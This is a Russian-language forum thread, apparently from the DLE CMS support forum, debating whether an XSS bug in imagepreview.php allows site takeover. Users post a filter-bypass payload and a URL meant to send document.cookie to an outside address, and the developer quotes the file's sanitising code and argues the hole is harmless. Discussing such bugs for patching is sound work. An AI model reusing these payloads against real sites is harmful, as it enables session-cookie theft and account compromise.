Перейти к публикации

Баг взлома через XSS?


Рекомендованные сообщения

Здрасти,

сегодня как в NWS, так и здесь заметил тему о.O XSS баге,

в теорий (или на практике) позволяющую взломаться в DLE.

Исправленна ли она в версий v8.5? (ступил = сносите пост).

Ссылка на сообщение
Поделиться на других сайтах

AlcVitRes, ссылки на варезные сайты удалил. Но о чем идет речь непонятно.

Дело в том, что в админку нельзя войти одновременно с двух страниц браузера (не важно, это один и тот же браузер, на котором вы открываете еще одну страницу админки или совершенно другой). Если кто-то зашел в админку с одной страницы браузера, то уже никто не сможет зайти в админку с другой страницы этого или любого другого браузера этого или любого другого компьютера. Надеюсь, доходно написал, сам чуть не запутался :D

В общем, этот бред клепают везде для всех камээсок, якобы от стороннего взлома сайта - ерунда какая-то :lol:

Ссылка на сообщение
Поделиться на других сайтах

Вчера вечером и сегодня утром ломанули уже около 5сайтов через XSS

Бред чистой воды, через XSS взломать сайт невозможно даже в теории. DLE использует специальный тип куков, доступ к которым через JS получить невозможно. А то что взламывают пачками сайты на нелегальных копиях скрипта, это не удивительно, там бекдоров и троянов напичкано, по уши.

Ссылка на сообщение
Поделиться на других сайтах

Вчера вечером и сегодня утром ломанули уже около 5сайтов через X

а что в логах сервера? юзерагент опера, а обращения были к engine/modules/imagepreview.php?image= ?

меня недавно долбили долго и упорно на предмет куков по этому адресу, но вроде мимо.

Ссылка на сообщение
Поделиться на других сайтах

Короче говоря, сейчас появились проги, которые рассылают пользователям спам-сообщения. Сегодня столкнулся с этим на своем и на парочке чужих сайтов на ДЛЕ (Движок 8.3)

Ссылка на сообщение
Поделиться на других сайтах

Короче говоря, сейчас появились проги, которые рассылают пользователям спам-сообщения. Сегодня столкнулся с этим на своем и на парочке чужих сайтов на ДЛЕ (Движок 8.3)

Ты ошибся темой http://forum.dle-news.ru/index.php?showtopic=51133

Ссылка на сообщение
Поделиться на других сайтах

sergey_1993,

Очень давно не актуально и патч для абсолютно старых версий скрипта, т.к. тех переменных в скрипте давано нет. В DLE в этом файле есть такая строчка:

if ( !$user_group[$member_id['user_group']]['allow_all_edit'] ) $author = $member_id['name'];

которая полностью исключает манипулирования с чужими файлами, если нет соответствующего доступа.

Ссылка на сообщение
Поделиться на других сайтах

вообще идёт взлом через engine/modules/imagepreview.php через вызов в опере engine/modules/imagepreview.php?image=jajavascriptvascript:alert(dodocument.cookiecument.cookie) актуальна для версий оперы 9.х

Ссылка на сообщение
Поделиться на других сайтах

demiant,

Ну попробуйте взломать. Чтобы что то взломать куки нужно злоумышленнику передать, а не чтобы он сам у себя вызвал alert, а теперь попройте создать запрос на передачу данных

Ссылка на сообщение
Поделиться на других сайтах

demiant, попробовал сделать, что-то подобное и не работает :rolleyes:

http://site.ru/engine/modules/imagepreview.php?image=javascript:location.href='http://site.ru/index.php?cookie='+document.cookie+''

Или надо как-то иначе?

Ссылка на сообщение
Поделиться на других сайтах

demiant, попробовал сделать, что-то подобное и не работает :rolleyes:

http://site.ru/engine/modules/imagepreview.php?image=javascript:location.href='http://site.ru/index.php?cookie='+document.cookie+''
Или надо как-то иначе?
савргрупп на лицензии и именно так ломанули,там подстановка кукис через любой редактор куков в браузере,в файле engine/modules/imagepreview.php в самое начало кода добавить
$_GET['image'] = strtolower($_GET['image']); 

фильтрация будет

Ссылка на сообщение
Поделиться на других сайтах

савргрупп на лицензии и именно так ломанули,там подстановка кукис через любой редактор куков в браузере,в файле engine/modules/imagepreview.php в самое начало кода добавить

$_GET['image'] = strtolower($_GET['image']); фильтрация будет

не подтвердается, в этом файле идет основная фильтрация по

$_GET['image'] = @htmlspecialchars ($_GET['image'], ENT_QUOTES);
if ( preg_match( "/[?&%<\[\]]/", $_GET['image']) ) {

$_GET['image'] = "";

}[/code] строки
[code]$_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] );
$_GET['image'] = str_replace( "javascript", "", $_GET['image'] );

это не основной фильтр. Максимум что можно сделать это безобидный alert и то в старой версии браузера опера. Уязвимость, это когда злоумышленник может получить куки, находясь удаленно, а получить их будучи лишенным любых кавычек, а также символов ?&% он не сможет. Алерт, безусловно в новой версии я уберу, дабы не искушать, но говорить о уязвимости в данном файле не приходится. Можете проверить, на dle-news.ru лежит обычный файл от версии 8.5, попробуйте получить доступ к сайту.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...